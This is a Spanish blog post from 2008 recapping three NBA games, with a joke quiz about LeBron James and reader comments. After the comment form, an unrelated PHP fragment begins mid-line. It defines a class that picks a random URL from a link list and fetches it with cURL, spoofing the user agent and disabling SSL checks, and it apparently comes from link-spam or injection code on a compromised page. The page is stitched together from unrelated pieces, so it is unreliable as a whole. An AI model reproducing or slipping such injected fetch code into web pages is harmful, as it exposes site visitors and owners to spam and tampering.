La crónica (17/01/08)

18 de January de 2008 por MagicJohnson32

Como es habitual, la madrugada del jueves dejó pocos resultados pero muy interesantes. Una reedición de las últimas Finales, el enfrentamiento entre los dos grandes de la NorthWest Division y, para acabar, un clásico de los Playoffs y batalla por el liderato de la Conferencia Oeste.

 

Vamos con el resumen de lo ocurrido en estos tres partidos:

Para empezar, los dos últimos finalistas se volvieron a ver las caras en San Antonio, esta vez con un resultado diferente al que se dio en aquella ocasión. Los Cavs se llevaron el triunfo por 90-88 gracias a que, por una vez, LeBron estuvo mejor secundado y los Spurs dependieron en exceso de sus tres estrellas. A los 27-9-7 de James se unieron Ilgauskas con 17-6, Varejao con 12 puntos y 14 rebotes, y Gibson con 11 puntos. Por los texanos, todos los puntos excepto 14 llegaron entre Duncan, Parker y Ginóbili, quien sólo erró cinco de sus 15 lanzamientos a canasta pero uno de sus fallos llegó sobre la bocina, en su intento por forzar la prórroga.

En Denver asistimos a la gran sorpresa de la noche, y no porque los Nuggets venciesen con cierta comodidad a los Jazz, 109-120, en la batalla entre los dos favoritos de la NorthWest (con permiso de los Blazers), sino por la actuación de Linas Kleiza: 41 puntos logró el lituano, que sumando sus últimos cinco partidos había anotado 42. Aunque otro compañero dejó cifras casi tan espectaculares: 24 rebotes y 11 tapones obtuvo Marcus Camby, que no completó el triple doble porque se quedó en 8 puntos. Los Jazz no acabaron de funcionar, a excepción de Deron, y sumaron su 18ª derrota.

Por último, los Suns sacaron provecho de la ausencia de Andrew Bynum, algo con lo que los Lakers han de aprender a convivir para las próximas semanas, y lograron por 106-98 su primer triunfo de la temporada ante los angelinos, ganadores de los dos enfrentamientos previos. Bryant no estuvo tan agresivo en ataque como contra los Sonics, se limitó a 22 tiros y logró 30 puntos, pero salvo Odom, como siempre mejor en la hoja de estadística que sobre el parquet, y Farmar, el resto del equipo no supo estar a la altura. Algo que sí hicieron los Suns: todos sus jugadores salvo Skinner anotaron más de 13 puntos; Nash, poco efectivo en el lanzamiento, repartió 20 asistencias; Marion y Diaw se merendaron a Odom y Walton, y Barbosa hizo el habitual estropicio al que somete a los Lakers. Con este triunfo, los Suns recuperan el liderato del Oeste aunque con la misma cifra de derrotas que Lakers, Mavs, Hornets y Spurs.kleizakarl

Nuestro MVP: dado que lo de Kleiza es la gran sorpresa de la noche, el MVP se lo vamos a conceder a Marcus Camby, que ante los Jazz capturó 24 rebotes y colocó 11 tapones, sus mejores cifras en ambos apartados en lo que va de temporada. Sólo logró 8 puntos pero su valor en estos Nuggets no se mide precisamente por su anotación.

La sorpresa de la noche: en un equipo con Iverson y Carmelo Anthony es difícil prever que otro jugador vaya a liderar el ataque. Linas Kleiza aprovechó que salió como titular para acertar con 13 de sus 21 lanzamientos de campo, con 4 de 8 en triples y 11 de 14 tiros libres, y disparar su cifra anotadora hasta los 41 puntos. Por si fuera poco, añadió 9 rebotes en 41 minutos.

La decepción de la noche: comentábamos ayer que en ausencia de Bynum, Bryant podía optar por lanzar todo lo que caiga en sus manos o esperar que sus compañeros den un paso adelante. Si hemos de guiarnos por lo sucedido anoche, Kobe haría bien en elevar considerablemente sus tiros. Derek Fisher y Luke Walton, dos de los mejores jugadores con los que cuenta Phil Jackson, firmaron una actuación espantosa al sumar entre ambos 1 de 10 en tiros, 4 rebotes, 2 asistencias, 5 pérdidas y 3 puntos.

Pasatiempos: ¿En qué consiste el truco de magia que intenta hacer LeBron James?

lebronsanantonio

A) en aprender a botar el balón antes de dar tres pasos

B) en hacer desaparecer a Larry Hughes, su 33,3% en tiros y su contrato de más de 12 millones al año

C) en convertir a Eric Snow en Jason Kidd

D) no es magia, sólo un poco de pose en un partido televisado en todo el país

Respuesta correcta: D, LeBron hace milagros pero no magia, porque Magic sólo habrá uno.

Entre los acertantes se sorteará un bote de polvo de talco y un manual de instrucciones que explica el proceso de aplicación y en el que que se especifica que el talco no se ha de lanzar al aire… salvo que haya una cámara de la TNT delante.

Acabamos con las 10 mejores acciones de la noche:

Comenta

5 comentarios a esta entrada

  1. txusma dice:
    #1

    Grande esos pasatiempos!! :D:D

      Citar

  2. MagicJohnson32 dice:
    #2

    Pero ¿has acertado la respuesta o no? Que te estás jugando el bote de talco…

      Citar

  3. txusma dice:
    #3

    Me la sabia, pero eso lo hace siempre no? Aunq no este la TNT delante…

      Citar

  4. Olafur dice:
    #4

    Lo hace siempre, lo que pasa es que Malone solo ve partidos de los amarillos jaja

      Citar

  5. MagicJohnson32 dice:
    #5

    Pues también es tontería hacer el numerito del talco si no hay una cámara de tv

    xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>